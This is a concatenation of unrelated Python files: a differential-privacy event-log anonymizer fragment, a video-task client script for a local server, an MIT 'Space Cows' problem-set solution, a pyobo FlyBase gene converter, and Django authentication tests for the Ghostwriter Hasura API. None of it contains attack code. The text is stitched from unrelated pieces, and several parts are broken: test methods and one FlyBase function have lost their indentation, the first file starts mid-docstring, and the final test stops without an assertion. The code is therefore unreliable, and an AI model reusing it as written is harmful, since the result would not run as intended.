        NOTE(review): indentation of this method was reconstructed; the nesting
        below assumes callers always pass eventNr > 0 and that the previous
        activity exists in distributionOfTimestamps -- confirm against callers.
        """
        # Cache lookup keyed by (previous activity, current activity).
        timestampDomain = self.__domainTimestampData.get(trace[eventNr - 1]["concept:name"], None)
        if timestampDomain is not None:
            timestampDomain = timestampDomain.get(trace[eventNr]["concept:name"], None)
        if timestampDomain is None:
            if eventNr != 0:
                dictTimestampDifference = distributionOfTimestamps.get(trace[eventNr - 1]["concept:name"], None)
                if dictTimestampDifference is not None:
                    timestampDistribution = dictTimestampDifference.get(trace[eventNr]["concept:name"], None)
                    if timestampDistribution is None:
                        # Unknown activity pair: fall back to the log-wide extremes.
                        maxTimestampDifference = self.__maxAllTimestampDifferences
                        minTimestampDifference = self.__minAllTimestampDifferences
                    else:
                        maxTimestampDifference = max(timestampDistribution)
                        minTimestampDifference = min(timestampDistribution)
            sensitivity = abs(maxTimestampDifference - minTimestampDifference).total_seconds()
            # Sensitivity of at least one second to avoid a degenerate mechanism.
            sensitivity = max(sensitivity, 1.0)
            timestampDomain = dict()
            timestampDomain["sensitivty"] = sensitivity  # sic: key misspelled but used consistently
            timestampDomain["minTimeStampInLog"] = min(allTimestampDifferences).total_seconds()
            if self.__domainTimestampData.get(trace[eventNr - 1]["concept:name"], None) is None:
                self.__domainTimestampData[trace[eventNr - 1]["concept:name"]] = dict()
            self.__domainTimestampData[trace[eventNr - 1]["concept:name"]][trace[eventNr]["concept:name"]] = timestampDomain
        return timestampDomain["sensitivty"], timestampDomain["minTimeStampInLog"]

    def __performTimestampShift(self, trace, mechanism):
        """Shift all events of a trace by one randomised offset (trace-level noise)."""
        beginOfTrace = trace[0][self.__timestamp]
        deltaBeginOfLogToTrace = (self.__minAllTimestamp - beginOfTrace).total_seconds()
        endOfTrace = trace[-1][self.__timestamp]
        traceDuration = (endOfTrace - beginOfTrace).total_seconds()
        deltaEndOfLogToTrace = (self.__maxAllTimestamp - beginOfTrace).total_seconds()
        # The shift may not push the trace's end past the end of the log.
        upperBound = deltaEndOfLogToTrace - traceDuration
        if deltaBeginOfLogToTrace >= upperBound:
            upperBound = abs((self.__maxAllTimestamp - beginOfTrace).total_seconds())
        mechanism.set_bounds(deltaBeginOfLogToTrace, upperBound)
        timestampShift = timedelta(seconds=mechanism.randomise(0.0))
        for event in trace:
            event[self.__timestamp] = event[self.__timestamp] + timestampShift
            if event[self.__timestamp] < self.__minAllTimestamp:
                print("That should not happen")

    def anonymize(self, log, distributionOfAttributes, epsilon, allTimestampDifferences, allTimestamps):
        """Anonymize *log* in place and return it with the collected first-event
        "InfectionSuspected" values."""
        print("Setting up the mechanisms")
        starttime = datetime.datetime.now()
        self.__maxAllTimestampDifferences = max(allTimestampDifferences)
        self.__minAllTimestampDifferences = min(allTimestampDifferences)
        self.__maxAllTimestamp = max(allTimestamps)
        self.__minAllTimestamp = min(allTimestamps)
        # Trace-level shift mechanism: sensitivity spans the whole log duration.
        timeShiftMechanism = privacyMechanisms.LaplaceBoundedDomain()
        timeShiftMechanism.set_epsilon(epsilon).set_sensitivity((self.__maxAllTimestamp - self.__minAllTimestamp).total_seconds())
        mechanisms = self.__setupMechanisms(epsilon, distributionOfAttributes)
        self.__domainTimestampData = dict()
        endtime = datetime.datetime.now()
        time = endtime - starttime
        print("Done with setting up mechanisms after " + str(time))
        i = 0
        for trace in log:
            for eventNr in range(0, len(trace)):
                event = trace[eventNr]
                for attribute in event.keys():
                    if attribute != self.__timestamp:
                        event[attribute] = self.__anonymizeAttribute(event[attribute], mechanisms.get(attribute, None))
                        if attribute == "InfectionSuspected" and eventNr == 0:
                            self.__infectionSuspected.append(event[attribute])
                    elif eventNr > 0:
                        # Timestamp of a non-first event: bounded by its neighbours.
                        previousTimestamp = self.__getTimestamp(trace, eventNr - 1, allTimestamps)
                        nextTimestamp = self.__getTimestamp(trace, eventNr + 1, allTimestamps)
                        sensitivity, minTimestampDifference = self.__getTimestampDomain(trace, eventNr, distributionOfAttributes[self.__timestamp], allTimestampDifferences)
                        event[attribute] = self.__anonymizeTimeStamps(event[attribute], previousTimestamp, nextTimestamp, sensitivity, minTimestampDifference, mechanisms[self.__timestamp])
                    elif eventNr == 0:
                        # First event's timestamp: shift the whole trace instead.
                        self.__performTimestampShift(trace, timeShiftMechanism)
            i = i + 1
            if (i % 100) == 0:
                print("Iteration " + str((i)))
        return log, self.__infectionSuspected
# encoding:utf-8
# date:2020-11-30
# author: x.l.eric
# function: dp client
import os
import requests
import base64
import cv2
import json
import numpy as np
import time
import traceback
import random
from pupdb.core import PupDB # 数据库
from dp_utils import *
def create_task_id():
    """Build a task id: six random lowercase letters, a random int, a timestamp."""
    letters = "".join(chr(random.randint(97, 122)) for _ in range(6))
    stamp = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime())
    return "task_{}_{}_{}".format(letters, random.randint(0, 65535), stamp)
if __name__ == "__main__":
    # --------------------------------------------------- Step 1: create the task and start the service request
    task_id = create_task_id()
    print("task_id", task_id)
    video_path = "./video/NBA.mp4"
    image_path = "./image/test.jpg"
    # NOTE(review): these file handles are never closed explicitly.
    files = {"task_video_file": open(video_path, 'rb'),
             "task_image_file": open(image_path, 'rb'),
             };
    data = {'task_id': task_id,
            "pattern": "video",
            }
    host = "http://127.0.0.1:"
    port = "6666"
    request_url = host + port + "/task"
    print("\n----->>>step 1 : start task\n")
    r = requests.post(request_url, data=data, files=files)
    msg = r.json()
    for k_ in msg.keys():
        print(" {} : {}".format(k_, msg[k_]))
    # ----------------------------------------------------- Step 2: poll the task state until it reports "done"
    print("\n----->>>step 2 : get task state\n")
    request_url = host + port + "/task_state"
    flag_break = False
    while True:
        st_ = time.time()
        time.sleep(1)  # poll once per second
        r = requests.get(request_url, data={"task_id": task_id})
        et_ = time.time()
        msg = r.json()
        for k_ in msg.keys():
            print("{} : {}".format(k_, msg[k_]))
            if msg[k_] == "done":
                flag_break = True
                break
        if flag_break:
            break
    # ------------------------------------------------------ Step 3: fetch the visualized result image
    print("\n----->>>step 3 : get image_target_file \n")
    request_url = host + port + "/target_image_file"
    st_ = time.time()
    r = requests.get(request_url, data={"task_id": task_id}, timeout=600)
    et_ = time.time()
    if not os.path.exists('./target_image'):
        os.mkdir('./target_image')
    target_file = "./target_image/target_{}.jpg".format(task_id)
    with open(target_file, 'wb') as file_:
        print("save image target file ~")
        file_.write(r.content)
    # Display the downloaded image until a key is pressed.
    img_ = cv2.imread(target_file)
    cv2.namedWindow("target_image", 0)
    cv2.imshow("target_image", img_)
    cv2.waitKey(0)
    cv2.destroyAllWindows()
    # ------------------------------------------------------ Step 4: fetch the visualized result video
    print("\n----->>>step 4 : get video_target_file \n")
    request_url = host + port + "/target_video_file"
    st_ = time.time()
    r = requests.get(request_url, data={"task_id": task_id}, timeout=600)
    et_ = time.time()
    if not os.path.exists('./target_video'):
        os.mkdir('./target_video')
    target_file = "./target_video/target_{}.mp4".format(task_id)
    with open(target_file, 'wb') as file_:
        print("save video target file ~")
        file_.write(r.content)
    # ----------------------------------------------------- Step 5: play the result video locally
    print("\n----->>>step 5 : show target file \n")
    show_video(target_file)
|
<gh_stars>0
###########################
# 6.00.2x Problem Set 1: Space Cows
from ps1_partition import get_partitions
import time
#================================
# Part A: Transporting Space Cows
#================================
def load_cows(filename):
    """
    Read the contents of the given file. Assumes the file contents contain
    data in the form of comma-separated cow name, weight pairs, and return a
    dictionary containing cow names as keys and corresponding weights as values.

    Parameters:
    filename - the name of the data file as a string

    Returns:
    a dictionary of cow name (string), weight (int) pairs
    """
    cow_dict = dict()
    # Use a context manager so the file is closed even on error
    # (the original opened it and never closed it).
    with open(filename, 'r') as f:
        for line in f:
            line_data = line.split(',')
            # int() tolerates the trailing newline on the weight field.
            cow_dict[line_data[0]] = int(line_data[1])
    return cow_dict
# Problem 1
def greedy_cow_transport(cows, limit=10):
    """
    Uses a greedy heuristic to determine an allocation of cows that attempts to
    minimize the number of spaceship trips needed to transport all the cows. The
    returned allocation of cows may or may not be optimal.
    The greedy heuristic should follow the following method:

    1. As long as the current trip can fit another cow, add the largest cow that will fit
        to the trip
    2. Once the trip is full, begin a new trip to transport the remaining cows

    Does not mutate the given dictionary of cows.

    Parameters:
    cows - a dictionary of name (string), weight (int) pairs
    limit - weight limit of the spaceship (an int)

    Returns:
    A list of lists, with each inner list containing the names of cows
    transported on a particular trip and the overall list containing all the
    trips
    """
    # Names sorted by descending weight (ties broken by name, matching the
    # original (weight, name) reverse sort).
    sorted_cows = [name for weight, name in
                   sorted(((w, n) for n, w in cows.items()), reverse=True)]
    trips = []
    used = set()  # set membership is O(1); the original used an O(n) list scan
    while len(used) < len(sorted_cows):
        trip = []
        weight = 0
        for name in sorted_cows:
            if name not in used and weight + cows[name] <= limit:
                trip.append(name)
                used.add(name)
                weight += cows[name]
        if not trip:
            # Every remaining cow exceeds the limit; the original looped forever
            # here, appending empty trips. Stop instead of hanging.
            break
        trips.append(trip)
    return trips
# Problem 2
def brute_force_cow_transport(cows, limit=10):
    """
    Finds the allocation of cows that minimizes the number of spaceship trips
    via brute force.  The brute force algorithm should follow the following method:

    1. Enumerate all possible ways that the cows can be divided into separate trips
    2. Select the allocation that minimizes the number of trips without making any trip
        that does not obey the weight limitation

    Does not mutate the given dictionary of cows.

    Parameters:
    cows - a dictionary of name (string), weight (int) pairs
    limit - weight limit of the spaceship (an int)

    Returns:
    A list of lists, with each inner list containing the names of cows
    transported on a particular trip and the overall list containing all the
    trips
    """
    # Enumerate every partition of the cow names, shortest partitions first.
    candidate_partitions = sorted(get_partitions(cows), key=len)
    # Keep only partitions where every trip respects the weight limit.
    valid = []
    for partition in candidate_partitions:
        trip_weights = [sum(cows[name] for name in trip) for trip in partition]
        if all(total <= limit for total in trip_weights):
            valid.append(partition)
    # Drop duplicate partitions while preserving order.
    deduped = []
    for partition in valid:
        if partition not in deduped:
            deduped.append(partition)
    # Return the first partition using the minimum number of trips.
    best_length = min(map(len, deduped))
    for partition in deduped:
        if len(partition) == best_length:
            return partition
# Problem 3
def compare_cow_transport_algorithms():
    """
    Using the data from ps1_cow_data.txt and the specified weight limit, run your
    greedy_cow_transport and brute_force_cow_transport functions here. Use the
    default weight limits of 10 for both greedy_cow_transport and
    brute_force_cow_transport.

    Print out the number of trips returned by each method, and how long each
    method takes to run in seconds.

    Returns:
    Does not return anything.
    """
    # Relies on the module-level `cows` loaded at the bottom of this file.
    start = time.time()
    greedy_trips = greedy_cow_transport(cows, 10)
    elapsed = time.time() - start
    # The original only printed the elapsed time; the docstring also requires
    # the number of trips, so print both.
    print("greedy_cow_transport: {} trips in {} seconds".format(len(greedy_trips), elapsed))
    start = time.time()
    brute_trips = brute_force_cow_transport(cows, 10)
    elapsed = time.time() - start
    print("brute_force_cow_transport: {} trips in {} seconds".format(len(brute_trips), elapsed))
# Script entry: load the data set and run the timing comparison.
cows = load_cows("ps1_cow_data.txt")
limit = 100  # NOTE(review): assigned but never used; both calls below use limit 10.
print(cows)
compare_cow_transport_algorithms()
|
# -*- coding: utf-8 -*-
"""Converter for FlyBase Genes."""
import logging
from typing import Iterable, Mapping, Optional, Set
import click
import pandas as pd
from more_click import verbose_option
from tqdm import tqdm
from pyobo import Reference
from pyobo.struct import Obo, Term, from_species, orthologous
from pyobo.utils.io import multisetdict
from pyobo.utils.path import ensure_df
logger = logging.getLogger(__name__)
BASE_URL = "http://ftp.flybase.net/releases"
PREFIX = "flybase"
NAME = "FlyBase"
def _get_version(version: Optional[str] = None) -> str:
if version is not None:
return version
import bioversions
return bioversions.get_version("flybase")
def _get_names(version: Optional[str] = None, force: bool = False) -> pd.DataFrame:
    """Download and cache the FlyBase expanded gene table for *version*."""
    version = _get_version(version)
    url = f"{BASE_URL}/FB{version}/precomputed_files/genes/fbgn_fbtr_fbpp_expanded_fb_{version}.tsv.gz"
    df = ensure_df(
        PREFIX,
        url=url,
        force=force,
        version=version,
        skiprows=4,  # skip the file's comment preamble
        usecols=[0, 1, 2, 3, 4],
        skipfooter=1,  # drop the trailing footer line
    )
    return df
def _get_organisms(version: Optional[str] = None, force: bool = False) -> Mapping[str, str]:
    """Get mapping from abbreviation column to NCBI taxonomy ID column."""
    version = _get_version(version)
    url = f"http://ftp.flybase.net/releases/FB{version}/precomputed_files/species/organism_list_fb_{version}.tsv.gz"
    df = ensure_df(
        PREFIX, url=url, force=force, version=version, skiprows=4, header=None, usecols=[2, 4]
    )
    # Rows without a taxonomy ID are dropped before building the mapping.
    df.dropna(inplace=True)
    return dict(df.values)
def _get_definitions(version: Optional[str] = None, force: bool = False) -> Mapping[str, str]:
    """Get mapping from FlyBase gene identifier to its automated gene summary."""
    version = _get_version(version)
    url = f"http://ftp.flybase.net/releases/FB{version}/precomputed_files/genes/automated_gene_summaries.tsv.gz"
    df = ensure_df(
        PREFIX, url=url, force=force, version=version, skiprows=2, header=None, usecols=[0, 1]
    )
    return dict(df.values)
def _get_human_orthologs(
    version: Optional[str] = None, force: bool = False
) -> Mapping[str, Set[str]]:
    """Get mapping from FlyBase gene identifier to the set of HGNC ids of its
    human orthologs (one gene can have several)."""
    version = _get_version(version)
    url = (
        f"http://ftp.flybase.net/releases/FB{version}/precomputed_files/"
        f"orthologs/dmel_human_orthologs_disease_fb_{version}.tsv.gz"
    )
    df = ensure_df(
        PREFIX,
        url=url,
        force=force,
        version=version,
        skiprows=2,
        header=None,
        usecols=[0, 2],
        names=["flybase_id", "hgnc_id"],
    )
    # multisetdict groups repeated flybase ids into a set of HGNC ids.
    return multisetdict(df.values)
def _get_synonyms(version: Optional[str], force: bool) -> pd.DataFrame:
    """Download and cache the FlyBase synonyms table (not yet applied to terms)."""
    version = _get_version(version)
    url = f"http://ftp.flybase.net/releases/FB{version}/precomputed_files/synonyms/fb_synonym_fb_{version}.tsv.gz"
    df = ensure_df(PREFIX, url=url, force=force, version=version, skiprows=4, usecols=[0, 2])
    return df  # TODO use this
def get_obo(version: Optional[str] = None, force: bool = False) -> Obo:
    """Get OBO."""
    version = _get_version(version)
    return Obo(
        # Terms are produced lazily by get_terms with these kwargs.
        iter_terms=get_terms,
        iter_terms_kwargs=dict(force=force, version=version),
        name=NAME,
        ontology=PREFIX,
        typedefs=[from_species, orthologous],
        auto_generated_by=f"bio2obo:{PREFIX}",
        data_version=version,
    )
# Mapping from FlyBase gene-type strings to Sequence Ontology (SO) local
# identifiers, used to assign each gene term a parent SO class in get_terms.
GTYPE_TO_SO = {
    "SRP_RNA_gene": "0001269",
    "protein_coding_gene": "0001217",
    "pseudogene": "0000336",
    "lncRNA_gene": "0002127",
    "snRNA_gene": "0001268",
    "antisense_lncRNA_gene": "0002182",
    "tRNA_gene": "0001272",
    "rRNA_gene": "0001637",
    "snoRNA_gene": "0001267",
    "RNase_P_RNA_gene": "0001639",
    "rRNA_5S_gene": "0002238",
    "ncRNA_gene": "0001263",
    "RNase_MRP_RNA_gene": "0001640",
    "rRNA_18S_gene": "0002236",
    "rRNA_5_8S_gene": "0002240",
    "miRNA_gene": "0001265",
    "rRNA_28S_gene": "0002239",
}
def get_terms(version: Optional[str] = None, force: bool = False) -> Iterable[Term]:
    """Get terms."""
    version = _get_version(version)
    definitions = _get_definitions(version=version, force=force)
    abbr_to_taxonomy = _get_organisms(version=version, force=force)
    names_df = _get_names(version=version, force=force)
    human_orthologs = _get_human_orthologs(version=version, force=force)
    missing_taxonomies = set()
    # Map each gene-type string present in the names table to its SO reference.
    # A KeyError here would mean GTYPE_TO_SO lacks a type used in this release.
    so = {
        gtype: Reference.auto("SO", GTYPE_TO_SO[gtype])
        for gtype in names_df[names_df.columns[1]].unique()
    }
    # Yield the SO parent terms before the gene terms that reference them.
    for _, reference in sorted(so.items()):
        yield Term(reference=reference)
    for organism, gtype, identifier, symbol, name in tqdm(names_df.values):
        term = Term.from_triple(
            prefix=PREFIX,
            identifier=identifier,
            name=symbol,
            definition=definitions.get(identifier),
        )
        if gtype and pd.notna(gtype):
            term.append_parent(so[gtype])
        if pd.notna(name):
            # The full gene name becomes a synonym; the symbol is the primary name.
            term.append_synonym(name)
        for hgnc_curie in human_orthologs.get(identifier, []):
            if not hgnc_curie or pd.isna(hgnc_curie):
                continue
            term.append_relationship(orthologous, Reference.from_curie(hgnc_curie, auto=True))
        taxonomy_id = abbr_to_taxonomy.get(organism)
        if taxonomy_id is not None:
            term.append_relationship(from_species, Reference.auto("ncbitaxon", taxonomy_id))
        elif organism not in missing_taxonomies:
            # Warn only once per unknown species abbreviation.
            tqdm.write(f"missing mapping for species abbreviation: {organism}")
            missing_taxonomies.add(organism)
        yield term
    if missing_taxonomies:
        tqdm.write(f"there were {len(missing_taxonomies)} missing taxa in flybase genes")
@click.command()
@verbose_option
def _main():
    """CLI entry point: build the FlyBase OBO and write the default outputs."""
    obo = get_obo(force=True)
    obo.write_default(force=True, write_obo=True, write_obograph=True)


if __name__ == "__main__":
    _main()
|
<reponame>bbhunter/Ghostwriter
# Standard Libraries
import logging
from datetime import date, datetime, timedelta
# Django Imports
from django.conf import settings
from django.test import Client, TestCase
from django.urls import reverse
from django.utils import timezone
from django.utils.encoding import force_str
# Ghostwriter Libraries
from ghostwriter.api import utils
from ghostwriter.api.models import APIKey
from ghostwriter.factories import (
ActivityTypeFactory,
DomainFactory,
DomainStatusFactory,
EvidenceFactory,
HistoryFactory,
ProjectAssignmentFactory,
ProjectFactory,
ReportFactory,
ReportFindingLinkFactory,
ReportTemplateFactory,
ServerHistoryFactory,
ServerRoleFactory,
ServerStatusFactory,
StaticServerFactory,
UserFactory,
)
# Silence all log output for the duration of this test module.
logging.disable(logging.CRITICAL)

# NOTE(review): the literal looks like a scrubbed placeholder from an export;
# any non-empty string works for factory-created test users -- confirm.
PASSWORD = "<PASSWORD>!"
# Shared secret that Hasura is expected to send with action requests.
ACTION_SECRET = settings.HASURA_ACTION_SECRET
# Tests related to authentication in custom CBVs
class HasuraViewTests(TestCase):
"""
Collection of tests for :view:`api:HasuraView` and
:view:`api:HasuraActionView` custom CBVs.
"""
@classmethod
def setUpTestData(cls):
    """Create shared users, API tokens, and request payload for all tests."""
    cls.user = UserFactory(password=PASSWORD)
    cls.inactive_user = UserFactory(password=PASSWORD, is_active=False)
    cls.uri = reverse("api:graphql_test")
    # Create valid and invalid JWTs for testing
    yesterday = timezone.now() - timedelta(days=1)
    cls.user_token_obj, cls.user_token = APIKey.objects.create_token(
        user=cls.user, name="Valid Token"
    )
    cls.inactive_token_obj, cls.inactive_token = APIKey.objects.create_token(
        user=cls.inactive_user, name="Inactive User Token"
    )
    cls.expired_token_obj, cls.expired_token = APIKey.objects.create_token(
        user=cls.inactive_user, name="Expired Token", expiry_date=yesterday
    )
    cls.revoked_token_obj, cls.revoked_token = APIKey.objects.create_token(
        user=cls.inactive_user, name="Revoked Token", revoked=True
    )
    # Test data set as required inputs for the test view
    cls.data = {"input": {"id": 1, "function": "test_func", "args": {"arg1": "test"}}}
def setUp(self):
    # Fresh client per test so no state leaks between requests.
    self.client = Client()
def test_action_with_valid_jwt(self):
    """A valid JWT plus the correct action secret is accepted (200)."""
    _, token = utils.generate_jwt(self.user)
    response = self.client.post(
        self.uri,
        data=self.data,
        content_type="application/json",
        **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
    )
    self.assertEqual(response.status_code, 200)
def test_action_requires_correct_secret(self):
    """A wrong action secret is rejected with 403 even with a valid JWT."""
    _, token = utils.generate_jwt(self.user)
    response = self.client.post(
        self.uri,
        data=self.data,
        content_type="application/json",
        **{"HTTP_HASURA_ACTION_SECRET": "wrong", "HTTP_AUTHORIZATION": f"Bearer {token}"},
    )
    self.assertEqual(response.status_code, 403)
def test_action_requires_secret(self):
    """A missing action secret is rejected with 403 and an explanatory payload."""
    _, token = utils.generate_jwt(self.user)
    response = self.client.post(
        self.uri,
        data=self.data,
        content_type="application/json",
        **{"HTTP_AUTHORIZATION": f"Bearer {token}", },
    )
    self.assertEqual(response.status_code, 403)
    result = {
        "message": "Unauthorized access method",
        "extensions": {"code": "Unauthorized", },
    }
    self.assertJSONEqual(force_str(response.content), result)
def test_action_requires_all_input(self):
    """Missing or incomplete ``input`` payloads yield 400 with distinct messages."""
    _, token = utils.generate_jwt(self.user)
    # Test with no data
    response = self.client.post(
        self.uri,
        content_type="application/json",
        **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
    )
    self.assertEqual(response.status_code, 400)
    result = {
        "message": "Missing all required inputs",
        "extensions": {"code": "InvalidRequestBody", },
    }
    self.assertJSONEqual(force_str(response.content), result)
    # Test with incomplete data
    response = self.client.post(
        self.uri,
        data={"input": {"id": 1, }},
        content_type="application/json",
        **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
    )
    self.assertEqual(response.status_code, 400)
    result = {
        "message": "Missing one or more required inputs",
        "extensions": {"code": "InvalidRequestBody", },
    }
    self.assertJSONEqual(force_str(response.content), result)
def test_action_with_invalid_json_input(self):
    """A body that is not valid JSON is rejected with 400."""
    _, jwt = utils.generate_jwt(self.user)
    headers = {
        "HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}",
        "HTTP_AUTHORIZATION": f"Bearer {jwt}",
    }
    resp = self.client.post(
        self.uri, data="Not JSON", content_type="application/json", **headers
    )
    self.assertEqual(resp.status_code, 400)
def test_action_requires_jwt(self):
    """A request without an ``Authorization`` header is rejected with 400."""
    resp = self.client.post(
        self.uri,
        data=self.data,
        content_type="application/json",
        **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}"},
    )
    self.assertEqual(resp.status_code, 400)
    expected = {
        "message": "No ``Authorization`` header found",
        "extensions": {"code": "JWTMissing"},
    }
    self.assertJSONEqual(force_str(resp.content), expected)
def test_action_with_valid_jwt_and_inactive_user(self):
    """Even a valid JWT is rejected (401) once the user is deactivated."""
    _, jwt = utils.generate_jwt(self.user)
    self.user.is_active = False
    self.user.save()
    headers = {
        "HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}",
        "HTTP_AUTHORIZATION": f"Bearer {jwt}",
    }
    resp = self.client.post(
        self.uri, data=self.data, content_type="application/json", **headers
    )
    self.assertEqual(resp.status_code, 401)
    # Restore the shared user so later tests see an active account
    self.user.is_active = True
    self.user.save()
def test_action_with_invalid_jwt(self):
    """A malformed bearer token is rejected with 401.

    The original literal ``"<PASSWORD>!"`` was an anonymization placeholder;
    any string that is not a well-formed JWT exercises the same path, so an
    intentionally malformed token is used instead.
    """
    token = "not.a.valid-jwt"
    response = self.client.post(
        self.uri,
        data=self.data,
        content_type="application/json",
        **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
    )
    self.assertEqual(response.status_code, 401)
def test_action_with_valid_tracked_token(self):
    """A valid tracked API token is accepted (200)."""
    headers = {
        "HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}",
        "HTTP_AUTHORIZATION": f"Bearer {self.user_token}",
    }
    resp = self.client.post(
        self.uri, data=self.data, content_type="application/json", **headers
    )
    self.assertEqual(resp.status_code, 200)
def test_action_with_valid_tracked_token_and_inactive_user(self):
    """A tracked token belonging to an inactive user is rejected (401)."""
    headers = {
        "HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}",
        "HTTP_AUTHORIZATION": f"Bearer {self.inactive_token}",
    }
    resp = self.client.post(
        self.uri, data=self.data, content_type="application/json", **headers
    )
    self.assertEqual(resp.status_code, 401)
def test_action_with_expired_tracked_token(self):
    """An expired tracked token is rejected (401)."""
    headers = {
        "HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}",
        "HTTP_AUTHORIZATION": f"Bearer {self.expired_token}",
    }
    resp = self.client.post(
        self.uri, data=self.data, content_type="application/json", **headers
    )
    self.assertEqual(resp.status_code, 401)
def test_action_with_revoked_tracked_token(self):
    """A revoked tracked token is rejected (401)."""
    headers = {
        "HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}",
        "HTTP_AUTHORIZATION": f"Bearer {self.revoked_token}",
    }
    resp = self.client.post(
        self.uri, data=self.data, content_type="application/json", **headers
    )
    self.assertEqual(resp.status_code, 401)
class HasuraEventViewTests(TestCase):
    """Collection of tests for the :view:`api:HasuraEventView` custom CBV."""

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.uri = reverse("api:graphql_event_test")
        cls.data = {
            "event": {
                "data": {
                    "new": {},
                    "old": {},
                },
            }
        }

    def setUp(self):
        self.client = Client()

    def post_event(self, body, **extra):
        # Shared POST helper so every test reads as "payload + headers -> status"
        return self.client.post(
            self.uri, data=body, content_type="application/json", **extra
        )

    def test_event_with_valid_input(self):
        """A well-formed event payload with the action secret is accepted."""
        resp = self.post_event(self.data, HTTP_HASURA_ACTION_SECRET=f"{ACTION_SECRET}")
        self.assertEqual(resp.status_code, 200)

    def test_action_requires_secret(self):
        """Omitting the action secret yields 403 and an ``Unauthorized`` body."""
        resp = self.post_event(self.data)
        self.assertEqual(resp.status_code, 403)
        expected = {
            "message": "Unauthorized access method",
            "extensions": {"code": "Unauthorized"},
        }
        self.assertJSONEqual(force_str(resp.content), expected)

    def test_requires_correct_secret(self):
        """An incorrect action secret is rejected with 403."""
        resp = self.post_event(self.data, HTTP_HASURA_ACTION_SECRET="wrong")
        self.assertEqual(resp.status_code, 403)

    def test_with_invalid_json(self):
        """A body that is not valid JSON is rejected with 400."""
        resp = self.post_event("Not JSON", HTTP_HASURA_ACTION_SECRET=f"{ACTION_SECRET}")
        self.assertEqual(resp.status_code, 400)
        expected = {
            "message": "Missing event data",
            "extensions": {"code": "InvalidRequestBody"},
        }
        self.assertJSONEqual(force_str(resp.content), expected)
# Tests related to the authentication webhook
class HasuraWebhookTests(TestCase):
    """Collection of tests for :view:`api:GraphqlAuthenticationWebhook`."""

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.uri = reverse("api:graphql_webhook")
        # Session variables the webhook returns for anonymous requests
        cls.public_data = {
            "X-Hasura-Role": "public",
            "X-Hasura-User-Id": "-1",
            "X-Hasura-User-Name": "anonymous",
        }

    def setUp(self):
        self.client = Client()

    def test_graphql_webhook_with_valid_jwt(self):
        """A valid JWT resolves to the user's own Hasura session variables."""
        _, jwt = utils.generate_jwt(self.user)
        expected = {
            "X-Hasura-Role": f"{self.user.role}",
            "X-Hasura-User-Id": f"{self.user.id}",
            "X-Hasura-User-Name": f"{self.user.username}",
        }
        resp = self.client.get(
            self.uri,
            content_type="application/json",
            HTTP_AUTHORIZATION=f"Bearer {jwt}",
        )
        self.assertEqual(resp.status_code, 200)
        self.assertJSONEqual(force_str(resp.content), expected)

    def test_graphql_webhook_without_jwt(self):
        """Requests without a JWT fall back to the public role."""
        resp = self.client.get(self.uri, content_type="application/json")
        self.assertEqual(resp.status_code, 200)
        self.assertJSONEqual(force_str(resp.content), self.public_data)
# Tests related to Hasura Actions
class HasuraLoginTests(TestCase):
    """Collection of tests for :view:`api:graphql_login`."""

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.uri = reverse("api:graphql_login")

    def setUp(self):
        self.client = Client()

    def test_graphql_login(self):
        """Valid credentials return a token payload."""
        data = {
            "input": {"username": f"{self.user.username}", "password": f"{PASSWORD}"}
        }
        response = self.client.post(
            self.uri,
            data=data,
            content_type="application/json",
            **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}"},
        )
        self.assertEqual(response.status_code, 200)
        # Test bypasses Hasura so the ``["data"]["login"]`` keys are not present
        self.assertTrue(response.json()["token"])

    def test_graphql_login_with_invalid_credentials(self):
        """Bad credentials yield 401 with an ``InvalidCredentials`` body.

        The original used the literal ``"<PASSWORD>"`` — a redaction
        placeholder; any password other than ``PASSWORD`` is invalid here.
        """
        data = {
            "input": {
                "username": f"{self.user.username}",
                "password": "definitely-not-the-password",
            }
        }
        result = {
            "message": "Invalid credentials",
            "extensions": {"code": "InvalidCredentials"},
        }
        response = self.client.post(
            self.uri,
            data=data,
            content_type="application/json",
            **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}"},
        )
        self.assertEqual(response.status_code, 401)
        self.assertJSONEqual(force_str(response.content), result)
class HasuraWhoamiTests(TestCase):
    """Collection of tests for :view:`api:GraphqlWhoami`."""

    @classmethod
    def setUpTestData(cls):
        cls.user = UserFactory(password=PASSWORD)
        cls.uri = reverse("api:graphql_whoami")

    def setUp(self):
        self.client = Client()
        self.client_auth = Client()
        # Log in once and fail fast if authentication is broken — the original
        # called ``login`` twice, performing the same work redundantly
        self.assertTrue(
            self.client_auth.login(username=self.user.username, password=PASSWORD)
        )

    def test_graphql_whoami(self):
        """A valid JWT returns the requesting user's profile data."""
        _, token = utils.generate_jwt(self.user)
        response = self.client.post(
            self.uri,
            content_type="application/json",
            **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {token}"},
        )
        self.assertEqual(response.status_code, 200)
        # Test bypasses Hasura so the ``["data"]["whoami"]`` keys are not present
        self.assertEqual(response.json()["username"], self.user.username)

    def test_graphql_whoami_with_tracked_token(self):
        """A tracked API token also resolves to the user's profile data."""
        user_token_obj, user_token = APIKey.objects.create_token(
            user=self.user, name="Valid Token"
        )
        response = self.client.post(
            self.uri,
            content_type="application/json",
            **{"HTTP_HASURA_ACTION_SECRET": f"{ACTION_SECRET}", "HTTP_AUTHORIZATION": f"Bearer {user_token}"},
        )
